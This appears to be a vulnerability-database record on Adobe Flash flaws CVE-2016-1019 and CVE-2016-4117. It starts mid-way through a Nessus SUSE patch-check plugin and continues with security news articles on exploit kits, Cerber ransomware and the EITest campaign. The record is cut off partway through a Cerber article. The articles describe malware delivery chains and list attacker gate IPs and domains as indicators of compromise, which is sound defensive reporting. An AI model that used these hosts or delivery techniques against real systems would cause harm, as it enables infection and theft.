value:\"https://www.suse.com/security/cve/CVE-2016-4115/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4116/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2016-4117/\");\n # https://www.suse.com/support/update/announcement/2016/suse-su-20161305-1/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e82b824a\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP1 :\n\nzypper in -t patch SUSE-SLE-WE-12-SP1-2016-772=1\n\nSUSE Linux Enterprise Workstation Extension 12 :\n\nzypper in -t patch SUSE-SLE-WE-12-2016-772=1\n\nSUSE Linux Enterprise Desktop 12-SP1 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-SP1-2016-772=1\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2016-772=1\n\nTo bring your system up-to-date, use 'zypper patch'.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/16\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:flash-player-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"x86_64\") audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLED12\" && (! 
preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0/1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"flash-player-11.2.202.621-130.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.621-130.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"flash-player-11.2.202.621-130.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"flash-player-gnome-11.2.202.621-130.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-player\");\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2018-01-27T10:06:53", "description": "[](<https://3.bp.blogspot.com/-GqLnLJ0erIQ/VoIpMsXEkQI/AAAAAAAAl_I/SZRl9xL7k8I/s1600/adobe-flash-player-security-patch-update.png>)\n\nAdobe has been one of the favorite picks of the Hackers to mess with any systems devoid of any operating systems, as Flash Player is a front runner in all the browsers.\n\n \n\n\nHackers have already been targeting Flash Player for long by exploiting known vulnerabilities roaming in the wild.\n\n \n\n\nDespite Adobe's efforts, Flash is not safe anymore for Internet security, as one more critical vulnerability had been discovered in the Flash Player that could crash the affected system and potentially allow an attacker to take control of the system.\n\n \n\n\nDiscovered by a French Researcher _Kafeine_, FireEye's_ Genwei Jiang_, and Google's _Clement Lecigne,_ the flaw affects Adobe Flash Player 21.0.0.197 and its earlier versions for Windows, Macintosh, Linux and Chrome OS.\n\n \n\n\nThe vulnerability, assigned under CVE-2016-1019, also 
expands back to Windows 7 and even towards Windows XP.\n \n\n\nAdobe had also [confirmed](<https://helpx.adobe.com/security/products/flash-player/apsa16-01.html>) that the newly discovered vulnerability in its Flash Player is being exploited actively in the wild.\n \n\n\n### Update Adobe Flash Player Software\n\n \n\n\nThis issue caused the Adobe engineers to urgently work on a mitigation method and release an emergency update under [Flash Player 21.0.0.182](<https://get.adobe.com/flashplayer/>), which is expected to get released this Thursday.\n \n\n\nUsually, Adobe releases its patch on the second Tuesday of the month, the same day as Microsoft, but rolls out emergency patches on an ad hoc basis, depending on the seriousness of the bug.\n \n\n\nThe endless Adobe updates and upgrades have failed to ensure user security in real-world scenarios. So it's high time for users to disable or completely uninstall Adobe Flash Player.\n \n\n\nBelieve it or not, Adobe Flash Player is dead and its time has passed.\n \n\n\nIn January last year, YouTube moved away from Flash for delivering videos.\n \n\n\nAlthough in between Flash made an effort to beef up its security in a bid to justify its existence, things got a bit heated when Firefox became aware of a critical bug and [blocked the Flash plugin](<https://thehackernews.com/2015/07/flash-zero-day-vulnerability.html>) entirely.\n \n\n\nFacebook\u2019s Security Chief publicly called for Adobe to announce a kill date for Flash. 
In fact, Google Chrome has also begun blocking auto-playing Flash ads by default.\n", "cvss3": {}, "published": "2016-04-05T23:26:00", "type": "thn", "title": "Adobe to issue Emergency Patch for Critical Flash Player Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2016-04-06T10:26:20", "id": "THN:C86B358352EEF0DC351F2DD0FA088E77", "href": "https://thehackernews.com/2016/04/adobe-flash-update.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:58", "description": "[](<https://3.bp.blogspot.com/-LcT8O23njws/WEe8BvRhm_I/AAAAAAAAqeA/D8GOfD7oCSMDAcImuqa7_-oueUq-qym5wCLcB/s1600/stegano-exploit-kit-malware-hacking.png>)\n\nIf you have visited any popular mainstream website over the past two months, your computer may have been infected \u2014 Thanks to a new exploit kit discovered by security researchers. \n \nResearchers from antivirus provider ESET released a [report](<http://www.welivesecurity.com/2016/12/06/readers-popular-websites-targeted-stealthy-stegano-exploit-kit-hiding-pixels-malicious-ads/>) on Tuesday stating that they have discovered an exploit kit, dubbed **Stegano**, hiding malicious code in the pixels of banner advertisements that are currently in rotation on several high profile news websites. \n \nStegano originally dates back to 2014, but since early October this year, cyber crooks had managed to get the malicious ads displayed on a variety of unnamed reputable news websites, each with Millions of daily visitors. \n \nStegano derived from the word **[Steganography](<https://thehackernews.com/2015/06/Stegosploit-malware.html>)**, which is a technique of hiding messages and content inside a digital graphic image, making the content impossible to spot with the naked eye. 
\n \nIn this particular malvertising campaign, operators hide malicious code inside transparent PNG image's Alpha Channel, which defines the transparency of each pixel, by altering the transparency value of several pixels. \n \nThe malvertising campaign operators then packed the altered image as an advertisement and managed to display those malicious ads on several high-profile websites. \n \nAccording to the researchers, the malicious ads promote applications called \"Browser Defense\" and \"Broxu,\" and the methodology makes it tough for ad networks to detect. \n \n\n\n### Here's How the Stegano Attack Works:\n\n \nOnce a user visits a site hosting malicious advertisement, the malicious script embedded in the ad reports information about the victim's computer to the attacker's remote server without any user interaction. \n \nThe malicious code then uses the CVE-2016-0162 vulnerability in Microsoft's Internet Explorer (IE) browser in order to scan the target computer to see if it is running on a malware analyst's machine. \n \nAfter verifying the targeted browser, the malicious script redirects the browser to a website that hosts Flash Player exploits for three now-patched Adobe Flash vulnerabilities: CVE-2015-8651, CVE-2016-1019, and CVE-2016-4117. \n\n\n> \"Upon successful exploitation, the executed shell code collects information on installed security products and performs \u2013 as paranoid as the cybercriminals behind this attack \u2013 yet another check to verify that it is not being monitored,\" ESET researchers wrote in a blog post. \"If results are favorable, it will attempt to download the encrypted payload from the same server again, disguised as a gif image.\"\n\nWhen downloaded to the victim's computer, the encrypted payload is then decrypted and launched via regsvr32.exe or rundll32.exe in Microsoft Windows. 
\n \n\n\n### Just Visit a Site, and You'll be Hacked in Just 2-3 Sec\n\n \nBelow is an ESET infographic that explains the working of Stegano's exploit attack: \n\n\n[](<https://2.bp.blogspot.com/-X5Wqj0LvCm4/WEfDwXzrj9I/AAAAAAAAqeQ/zo2BY0Bq_yE9IiBqIa-fkNdLmnHPtX9WgCLcB/s1600/exploit-kit-working.png>)\n\n \nAll the above operations execute automatically without any user interaction and take place in the span of just 2-3 seconds. \n \nSo far, the Stegano exploit kit has pushed various trojan downloaders, the Ursnif and Ramnit banking trojans, backdoors, spyware, and file stealers. \n \nThe Stegano exploit kit was initially used in 2014 to target people in the Netherlands, and then in 2015, moved on to residents in the Czech Republic. The latest attack campaign is targeting people in Canada, the UK, Australia, Spain, and Italy. \n \nThe best way to protect yourself against any malvertising campaign is always to make sure you are running updated software and apps. Also use reputable antivirus software that can detect such threats before they infect your system.\n", "cvss3": {}, "published": "2016-12-06T21:08:00", "type": "thn", "title": "Hacking Millions with Just an Image \u2014 Recipe: Pixels, Ads & Exploit Kit ", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-0162", "CVE-2016-1019", "CVE-2016-4117", "CVE-2015-8651"], "modified": "2016-12-07T08:09:54", "id": "THN:BF8375E3582DA11921BF468B0D3C4F03", "href": "https://thehackernews.com/2016/12/image-exploit-hacking.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T10:07:00", "description": "[](<https://1.bp.blogspot.com/-hkzXUb-YVK4/WUEpPWtqANI/AAAAAAAAtJM/WCJnuCuE5OEHcguz-fm_ZBsnx23blXhHACLcBGAs/s1600/north-korea-hacking-malware.png>)\n\nThe United States government has released a rare alert about an ongoing, eight-year-long North Korean state-sponsored hacking operation. 
\n \nThe [joint report](<https://www.us-cert.gov/ncas/alerts/TA17-164A>) from the FBI and U.S. Department of Homeland Security (DHS) provided details on \"**DeltaCharlie**,\" a malware variant used by \"**Hidden Cobra**\" hacking group to infect hundreds of thousands of computers globally as part of its DDoS botnet network. \n \nAccording to the report, the Hidden Cobra group of hackers are believed to be backed by the North Korean government and are known to launch cyber attacks against global institutions, including media organizations, aerospace and financial sectors, and critical infrastructure. \n \nWhile the US government has labeled the North Korean hacking group Hidden Cobra, it is often known as Lazarus Group and Guardians of Peace \u2013 the one allegedly [linked to the devastating WannaCry ransomware](<https://thehackernews.com/2017/05/wannacry-lazarus-north-korea.html>) menace that shut down hospitals and businesses worldwide. \n \n\n\n### DeltaCharlie \u2013 DDoS Botnet Malware\n\n \nThe agencies identified [IP addresses](<https://www.us-cert.gov/sites/default/files/publications/TA-17-164A_csv.csv>) with \"high confidence\" associated with \"DeltaCharlie\" \u2013 a DDoS tool which the DHS and FBI believe North Korea uses to launch distributed denial-of-service (DDoS) attacks against its targets. \n \nDeltaCharlie is capable of launching a variety of DDoS attacks on its targets, including [Domain Name System](<https://thehackernews.com/2014/06/dns-flood-ddos-attack-hit-video-gaming.html>) (DNS) attacks, [Network Time Protocol](<https://thehackernews.com/2014/01/Network-Time-Protocol-Reflection-DDoS-Attack-Tool.html>) (NTP) attacks, and Character Generation Protocol (CGP) attacks. \n \nThe botnet malware is capable of downloading executables on the infected systems, updating its own binaries, changing its own configuration in real-time, terminating its processes, and activating and terminating DDoS attacks. 
\n \nHowever, the DeltaCharlie DDoS malware is not new. \n \nDeltaCharlie was initially reported by Novetta in their 2016 Operation Blockbuster Malware Report [[PDF](<https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf>)], which described this as the third botnet malware from the North Korean hacking group, after DeltaAlpha and DeltaBravo. \n \nOther malware used by Hidden Cobra include [Destover](<https://securelist.com/destover/67985/>), Wild Positron or [Duuzer](<https://www.symantec.com/connect/blogs/duuzer-back-door-trojan-targets-south-korea-take-over-computers>), and [Hangman](<http://telussecuritylabs.com/threats/show/TSL20150910-04>) with sophisticated capabilities, including [DDoS botnets](<https://thehackernews.com/2016/11/ddos-attack-mirai-botnet.html>), keyloggers, remote access tools (RATs), and [wiper malware](<https://thehackernews.com/2013/03/south-korea-cyber-attack-wiper-malware.html>). \n \n\n\n### Hidden Cobra's Favorite Vulnerabilities\n\n \nOperating since 2009, Hidden Cobra typically targets systems running older, unsupported versions of Microsoft operating systems, and commonly exploits vulnerabilities in Adobe Flash Player to gain an initial entry point into victim's machine. 
\n \nThese are the known vulnerabilities affecting various applications usually exploited by Hidden Cobra: \n\n\n * Hangul Word Processor bug (CVE-2015-6585)\n * Microsoft Silverlight flaw ([CVE-2015-8651](<https://thehackernews.com/2015/12/adobe-flash-security-update.html>))\n * Adobe Flash Player 18.0.0.324 and 19.x vulnerability (CVE-2016-0034)\n * Adobe Flash Player 21.0.0.197 Vulnerability ([CVE-2016-1019](<https://thehackernews.com/2016/04/adobe-flash-update.html>))\n * Adobe Flash Player 21.0.0.226 Vulnerability ([CVE-2016-4117](<https://thehackernews.com/2016/12/image-exploit-hacking.html>))\n\nThe simplest way to defend against such attacks is always to keep your operating system and installed software and applications up-to-date, and protect your network assets behind a firewall. \n \nSince Adobe Flash Player is prone to many attacks and just today the company [patched nine vulnerabilities in Player](<https://thehackernews.com/2017/06/security-patch-tuesday.html>), you are advised to update or remove it completely from your computer. \n \nThe FBI and DHS have provided numerous indicators of compromise (IOCs), malware descriptions, network signatures, as well as host-based rules (YARA rules) in an attempt to help defenders detect activity conducted by the North Korean state-sponsored hacking group. 
\n\n\n> \"If users or administrators detect the custom tools indicative of HIDDEN COBRA, these tools should be immediately flagged, reported to the DHS National Cybersecurity Communications and Integration Center (NCCIC) or the FBI Cyber Watch (CyWatch), and given highest priority for enhanced mitigation,\" the alert reads.\n\nBesides this, the agencies have also provided a long list of mitigations for users and network administrators, which you can follow [here](<https://www.us-cert.gov/ncas/alerts/TA17-164A>).\n", "cvss3": {}, "published": "2017-06-14T01:23:00", "type": "thn", "title": "US Warns of 'DeltaCharlie' \u2013 A North Korean DDoS Botnet Malware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-6585", "CVE-2016-1019", "CVE-2016-0034", "CVE-2016-4117", "CVE-2015-8651"], "modified": "2017-06-14T12:23:04", "id": "THN:48EB36B9BBEE6D28A599E0C7CE3BA0C9", "href": "https://thehackernews.com/2017/06/north-korea-hacking-malware.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:55:19", "description": "Starting in April security experts at FireEye spotted a massive uptick in Cerber ransomware attacks delivered via a rolling wave of spam. Researchers there link the Cerber outbreaks to the fact that attackers are now leveraging the same spam infrastructure credited for making the potent Dridex financial Trojan extremely dangerous.\n\nCerber, which is best known for its high-creep factor in using text-to-speech to \u201cspeak\u201d its ransom note to victims, was first spotted in the wild in February. Its [typical distribution method was via exploit kits](<https://threatpost.com/latest-flash-zero-day-being-used-to-push-ransomware/117248/>), with Magnitude and Nuclear Pack exploiting a zero day in Adobe Flash Player (CVE-2016-1019). 
But as recently as May 4, FireEye reports, Cerber is now part of a spam campaign linked to Dridex botnets.\n\n\u201cBy partnering with the same spam distributor that has proven its capability by delivering Dridex on a large scale, Cerber is likely to become another serious email threat similar to Dridex and Locky,\u201d wrote FireEye security analysts in [a research blog](<https://www.fireeye.com/blog/threat-research/2016/05/cerber_ransomware_partners_with_Dridex.html>) posted Thursday.\n\nDridex is a financial Trojan that has emerged as a significant threat to consumers and business, targeting the acquisition of financially related credentials. Its chief means of distribution is Dridex botnets that have been behind massive spam campaigns since February and are responsible for pushing out millions of targeted spam messages a day.\n\nCerber ransomware, according to FireEye, follows the same spam framework as Dridex. Targets are sent emails with an attachment disguised as an invoice that contains malicious VBScript. Once the user opens the document, they\u2019re encouraged to enable macros.\n\nIn the case of Cerber, the malicious attachment obfuscates the offending VBScript that may be detected by an email gateway or spam filter. Instead, the macro downloads and installs the VBScript in the %appdata% path of the targeted PC. The VBScript is further manipulated to avoid detection and reverse engineering through the injection of junk code.\n\nNext, Cerber sniffs out whether a victim has an internet connection. If it does, the last piece of the Cerber ransomware is delivered. That\u2019s when the VBScript sends an HTTP Range Request to fetch a JPEG file from a URL. \u201cIn the HTTP Request Headers, it sets the value of Range Header to: \u201cbytes=11193-\u201c. 
This indicates to the web server to return only the content starting at offset 11,193 of the JPG file,\u201d FireEye wrote.\n\nThis multi-stage technique of delivering the Cerber payload, FireEye said, is similar to HTTP Range Request checks leveraged by Dridex and Ursnif Trojans.\n\nOther similarities that Cerber has to Dridex include the fact that spam campaigns are typically English language only and are financially motivated booby-trapped with invoice, receipt, and order attachments.\n\nOnce Cerber goes to work on a system, it targets email, Word documents, and Steam (gaming) related files appending encrypted files with the \u2018.cerber\u2019 file extension. Victims are directed to visit various versions of the \u201cdecrypttozxybarc\u201d domain. In some instances, FireEye said, Cerber also installs a spambot module on the host PC. Attackers, FireEye suspect, are in the test stages of using infected PCs for distributing spam.\n", "cvss3": {}, "published": "2016-05-13T13:24:49", "type": "threatpost", "title": "Cerber Ransomware On The Rise, Fueled By Dridex Botnet", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2016-05-13T17:24:49", "id": "THREATPOST:119E7D78B854D1FD10222FB18949985B", "href": "https://threatpost.com/cerber-ransomware-on-the-rise-fueled-by-dridex-botnets/118090/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:17", "description": "A two-year-old EITest malware campaign is still going strong, fueled by the fact it has shifted its distribution technique over time. 
Now, researchers at the SANS Institute\u2019s Internet Storm Center are reporting EITest is morphing again based on analysis of the malware campaign conducted earlier this month.\n\nAccording to researcher Brad Duncan, the EITest malware campaign is being refueled by the fact it is shifting from the Angler exploit kit to the Neutrino exploit kit.\n\n\u201cDuring its run, I had only noticed the EITest campaign use Angler EK to distribute a variety of malware payloads. That changed earlier this month, when I noticed an EITest gate leading to Neutrino EK instead of Angler,\u201d Duncan [wrote in an Internet Storm Center post](<https://isc.sans.edu/diary/EITest+campaign+still+going+strong/21081>).\n\nFirst identified in July of 2014 by Malwarebytes, EITest is known for leveraging thousands of legitimate websites that have been hacked and used in tandem with a Flash-based redirection script to deliver payloads such as the Gootkit Trojan information stealer.\n\nIn the case of EITest, attackers were booby trapping legitimate sites with drive-by downloads unbeknownst to their owners by using rotating URLs as the exploit kit\u2019s landing page. The perpetrators did this by inserting Flash application code at the bottom of an infected site\u2019s main page to direct traffic to a malicious landing page. To avoid URL blacklisting, attackers used free DNS services to register disposable subdomains to create a large pool of URLs that can be used once and then trashed.\n\nDuncan now says the EITest campaign is using 85.93.0.0/24 for a gate between the compromised website and the Neutrino EK. 
\u201cThe TLD for these gate domains has most often been .tk but we\u2019ve seen .co.uk domains used this week,\u201d he wrote.\n\nAs for the payload, in two instances Duncan reports he was running Adobe Flash Player 20.0.0.306, which is vulnerable to [CVE-2016-1019](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1019>), which allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code.\n\nPalo Alto Networks has also been tracking the progress of the stubborn EITest malware campaign. In March, researchers noticed that the EITest gate occasionally changes IP addresses, but consistently used the TLDs .tk, .uk and .com.\n\n\u201cThe EITest gate URL continues to return a Flash file that redirects traffic to Angler EK. This gate URL always generates two HTTP GET requests. The first request retrieves the Flash file and the second request returns script pointing to an Angler EK landing page,\u201d [wrote Palo Alto in March](<http://researchcenter.paloaltonetworks.com/2016/03/unit42-how-the-eltest-campaigns-path-to-angler-ek-evolved-over-time/>).\n\nNow SANS Institute\u2019s Internet Storm Center says the indicators of compromise on its test systems include the EITest gate 85.93.0.33 port 80 (true.imwright.co.uk) and 104.238.185.187 port 80 (ndczaqefc.anein.top) for the Neutrino EK with the payload Gootkit information stealer.\n\nDuncan observed a second infection chain from the EITest campaign that used the Angler EK, with the following indicators of compromise: 85.93.0.33 port 80 \u2013 _true.imwright.co.uk_ \u2013 EITest gate, 185.117.75.219 port 80 \u2013 _kmgb0.yle6to.top_ \u2013 Angler EK, delivering an undetermined payload.\n", "cvss3": {}, "published": "2016-05-23T13:08:28", "type": "threatpost", "title": "Persistent EITest Malware Campaign Jumps from Angler to Neutrino", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2016-05-23T17:08:28", "id": 
"THREATPOST:6844AEC17FA3A44CD47E847B8DC4AC54", "href": "https://threatpost.com/persistent-eitest-malware-campaign-jumps-from-angler-to-neutrino/118249/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:31", "description": "Exploits for a zero-day vulnerability in Adobe Flash Player are being aggressively distributed in two exploit kits. The zero day, meanwhile, was patched by Adobe in an [emergency update](<https://helpx.adobe.com/security/products/flash-player/apsb16-10.html>) released Thursday night.\n\nAttackers are using the previously unpatched flaw in the maligned Flash Player to infect victims with either Locky or Cerber ransomware. [Locky](<https://threatpost.com/locky-variant-changes-c2-communication-found-in-nuclear-ek/117196/>) is a relatively new crypto-ransomware strain, spread primarily via spam with attachments enticing users to enable macros in Word documents that download the malware onto machines. [Cerber](<http://www.bleepingcomputer.com/news/security/the-cerber-ransomware-not-only-encrypts-your-data-but-also-speaks-to-you/>) is also crypto-ransomware that includes a feature where the infected machine will speak to the victim.\n\nThis turn in using the exploit kits to move ransomware isn\u2019t new, but does escalate the distribution of Locky in particular, which is believed to be at the heart of a number of [high-profile compromises](<https://threatpost.com/locky-ransomware-causes-internal-state-of-emergency-at-kentucky-hospital/116949/>) in the health care industry.\n\nResearchers at Proofpoint said the zero day has been folded into both the Nuclear and Magnitude exploit kits, with Nuclear infections pushing Locky and Magnitude spreading Cerber.\n\nThe zero day vulnerability affects all versions of Flash Player on Windows 10 and earlier, said Kevin Epstein, vice president of Proofpoint\u2019s threat operations center. 
Today\u2019s update patched two dozen vulnerabilities, including the zero day; most of the flaws were memory corruption bugs, as well as use-after-free, type-confusion and stack overflow bugs, in addition to a security bypass vulnerability.\n\nWhile the attackers have hundreds of millions of potential targets at their disposal with the zero day, they have limited this particular exploit to older versions of Flash Player, Epstein said.\n\n\u201cThe interesting thing about this distribution of the exploit is that the attackers don\u2019t appear to have taken full advantage of the exploit,\u201d he said. \u201cIt\u2019s not clear if they fully understood what they had. It is a zero day, but within this exploit kit, it\u2019s only targeting earlier versions of Flash. They\u2019ve self-limited their target audience, and it\u2019s not clear why.\u201d\n\nNonetheless, the exploit has been aggressively distributed, and for some time. While the Magnitude distribution of Cerber ransomware was found only in the last 72 hours, Epstein said Nuclear has been pushing Locky using this exploit since March 31.\n\nThe scale of these attacks has the potential to be massive, Proofpoint said. While both Nuclear and Magnitude are not as prevalent on the scale of the Angler EK, they are effective and popular choices on the black market. Combine that with previous distributions of Locky in a number of spam campaigns, some of them reaching multimillions of email messages a day, according to Proofpoint, and there is the potential for longstanding trouble.\n\nAdobe said in an [advance notification](<https://threatpost.com/emergency-update-coming-for-flash-vulnerability-under-attack/117219/>) two days ago that an exploit could crash a system and allow attackers to execute arbitrary code on a compromised machine. Adobe added that a mitigation introduced on March 10 in Flash 21.0.0.182 protects users against attack; users are urged to update immediately. 
Adobe said active attacks using CVE-2016-1019 are targeting Windows 7 and Windows XP systems running Flash 20.0.0.306 and earlier.\n\n\u201cThe nature of vulnerability allows the attackers to execute arbitrary code on your machine; in this case, the Flash exploit is assisting the attacker to write arbitrary instructions to a point in memory,\u201d Epstein said. \u201cThat set of instructions in this case downloads the ransomware and executes it.\u201d\n\nEpstein said that the exploit is checking only for older versions of Flash Player, even though all versions prior to today\u2019s update are vulnerable.\n\nThe escalation of ransomware is alarming with new capabilities being regularly added to new strains. Ransomware such as Locky, for example, will encrypt all files stored on a machine and will seek out other machines on network shares, or even online backups the target machine may have access to. Victims are prompted to pay relatively inexpensive ransoms in Bitcoin in order to retrieve their locked files.\n\n\u201cRansomware, we suspect because of the macro economic ROI is something that\u2019s going to be a growing problem,\u201d Epstein said. 
\u201cIt\u2019s here to stay a while.\u201d\n", "cvss3": {}, "published": "2016-04-07T21:08:20", "type": "threatpost", "title": "Latest Flash Zero Day Being Used to Push Ransomware", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-1019"], "modified": "2016-04-11T12:07:04", "id": "THREATPOST:B072B076007EAC04FA7859A728FEF476", "href": "https://threatpost.com/latest-flash-zero-day-being-used-to-push-ransomware/117248/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:54:23", "description": "Criminals behind the latest Cerber ransomware variant are leveraging Google redirects and Tor2Web proxies in a new and novel way to evade detection.\n\nResearchers with Cisco Talos spotted the shifting tactic last week when they began tracking the latest Cerber (5.0.1) ransomware variant. The technique defies Cerber\u2019s typical attack strategy of spam campaigns, malicious attachments and well-written, professional-looking emails, according to Talos researchers.\n\n\u201cThis campaign looked different in that the messages didn\u2019t contain an attachment and were extremely short and basic,\u201d wrote Cisco Talos [researchers in a report posted Monday](<http://blog.talosintel.com/2016/11/cerber-spam-tor.html>). According to Talos, the Cerber spam campaign resembled something more closely associated with Locky ransomware, which relies heavily on script-based file extensions used to download the Locky executable.\n\nTalos describes this latest Cerber campaign as a \u201cpotential next evolution for ransomware distribution\u201d that relies heavily on the Tor network and Dark Web to obfuscate the attacker\u2019s activity and thwart mitigation efforts.\n\nAccording to Talos, the Cerber 5.0.1 variant forgoes the use of malicious attachments in exchange for emails that contain hyperlinks. 
Targets are enticed to click hyperlinks that are disguised as various files of potential interest to recipients such as pictures, order details, transaction logs and loan acceptance letters.\n\n\u201cWhen a victim clicks on a hyperlink they are taken to a Google redirect that points (the browser) to a malicious Word document hosted on the Dark Web. But because you need a Tor browser to access the Dark Web, attackers use the Google redirect service to connect targets to a Tor2Web proxy service first,\u201d said Nick Biasini, researcher with the Cisco Talos team.\n\nUse of the Tor2Web proxy service allows adversaries to host files on the Dark Web, making it extremely difficult to know where files are hosted and shut down the offending server, Biasini said. \u201cUsing proxy services like Tor2Web enables access to the Tor network without requiring a Tor client to be installed locally on the victim\u2019s system,\u201d researchers point out.\n\n\u201cWe have seen Tor used in ransomware quite a bit. But it has been used primarily for command-and-control communications and retrieving ransom notes for the victims to get Bitcoin wallets. What makes this most recent Cerber (5.0.1) variant so interesting to researchers is the fact the hosting of all the malicious activity is on Tor,\u201d Biasini said.\n\nThat\u2019s not to say earlier incarnations and techniques associated with Cerber ransomware have been abandoned. Still, the bulk of Cerber, Biasini said, is distributed using traditional techniques such as the RIG exploit kit and malicious attachments sent via spam campaigns. \u201cThe reason this campaign is important is because it signals an evolution for Cerber adversaries,\u201d Biasini said.\n\nCerber, which is best known for its high-creep factor in using text-to-speech to \u201cspeak\u201d its ransom note to victims, was first spotted in the wild in February. 
